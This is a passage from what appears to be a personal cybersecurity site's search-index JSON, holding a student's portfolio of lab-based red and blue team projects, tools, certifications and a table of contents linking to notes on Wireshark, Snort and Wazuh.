am attacking or protecting.\nI prefer a hands-on, research-driven approach, utilizing extensive home labs to simulate Phishing Campaigns, set up basic C2 Operations, and practice Blue Team monitoring. Currently, I am also refining my low-level programming skills in C to better understand operating system internals.\nSkills \u0026amp; Technologies System Administration Linux: Deep knowledge of permissions, process management, Bash scripting, and service configuration. Windows: Active Directory (AD) deployment, GPO management, PowerShell automation, and domain hardening. Security Operations Red Teaming: Phishing Campaign Development, Basic C2 Infrastructure (setup \u0026amp; connectivity), Active Directory Exploitation. Blue Teaming: Log Analysis, SIEM fundamentals, Windows Forensics, Linux Forensics, and System Hardening. Languages \u0026amp; Tools Languages: Python (Automation), C (Low-level dev), Bash, powershell. Tools: Metasploit, Burp Suite, Wireshark, Sysinternals, Powershell Empire, shellter, Evilginx2, GoPhish, BloodHound, Mimikatz, Responder, NetExec, ffuf, proxychains, suricata, wazuh Projects 1. Enterprise Home Lab \u0026amp; Adversary Emulation The core of my practical learning.\nInfrastructure: Deployed a complete Active Directory environment with Domain Controllers, Workstations, and Linux servers. Red Operations: Executed simulated Phishing campaigns and deployed basic C2 agents to test network defenses and persistence. Blue Operations: Monitored traffic and system logs to detect the artifacts generated by my own attacks, bridging the gap between Red and Blue teaming. 2. Build Your Own Shell (C Language) Part of CodeCrafters Challenge\nDeveloping a POSIX-compliant shell in C. Implementing core system interactions, process creation, and signal handling to understand Linux internals at a deeper level. 3. Remote Control (RC) Car Designed and assembled a custom RC car, handling component selection, circuit assembly, and motor control logic. Key components used - Arduino Uno , L298N Motor Driver, DC Gear Motors, HC-05 Bluetooth Module, Li-ion Batteries. 4. Cybersecurity Blog \u0026amp; Knowledge Base Built and maintained this site using Hugo \u0026amp; PaperMod. Documenting System Administration guides, penetration testing methodologies, Blue Team Operations and lab configurations. Certifications \u0026amp; Courses eJPT (eLearnSecurity Junior Penetration Tester) - INE Security RH-124 - Red Hat Academy RH-134 - Red Hat Academy PNPT coursework (Practical Network Penetration Tester) - TCM Security Practical Help Desk - TCM Security Experience Cybersecurity Student / Researcher Self-Employed / Academic | 2025 - Present\nEnterprise System Administration: Designed and administered a hybrid Linux/Windows environment mimicking corporate scale. Configured core services (AD DS, DNS, DHCP), enforced network isolation via VLANs, and utilized Python \u0026amp; Bash to automate configuration management and system hardening. Network Penetration Testing: Conducted end-to-end assessments to validate security postures, utilizing simulated phishing campaigns via azure for initial access and deploying basic C2 infrastructure to test network persistence. Successfully executed complex exploit chains targeting Active Directory misconfigurations and lateral movement paths. Security Infrastructure Implementation: Deployed and integrated a centralized security monitoring stack (Wazuh, Suricata, Zeek) to audit system logs and network traffic, ensuring comprehensive visibility and verifying the detection of specific attack signatures. CTFs Active participant in CTF events (HackTheBox, PicoCTF). Focused on realistic network scenarios, privilege escalation, and lateral movement challenges. Contact Email: sebaitsom6297@gmail.com Socials: LinkedIn / Twitter / GitHub Resume Download My Resume (PDF)\n","permalink":"https://0x-s0M3n4th.github.io/portfolio/","summary":"System Administration, Blue Teaming, and Red Team Operations.","title":"Portfolio"},{"content":"Table of Contents Blogs My First Blog Blog 1 Notes Practical Wireshark Practical Snort Practical Wazuh ","permalink":"https://0x-s0M3n4th.github.io/table-of-contents/","summary":"\u003ch2 id=\"table-of-contents\"\u003eTable of Contents\u003c/h2\u003e\n\u003ch3 id=\"blogs\"\u003eBlogs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"/blogs/welcome/\"\u003eMy First Blog\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"/blogs/blog_1/\"\u003eBlog 1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"notes\"\u003eNotes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"/notes/blue-team-ops/00-wireshark/intro-to-wireshark/\"\u003ePractical Wireshark\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"/notes/blue-team-ops/01-snort/intrusion-detection-with-snort/\"\u003ePractical Snort\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"/notes/blue-team-ops/02-wazuh/00-introduction-\u0026#43;-installation/\"\u003ePractical Wazuh\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","title":"Table of Contents"}]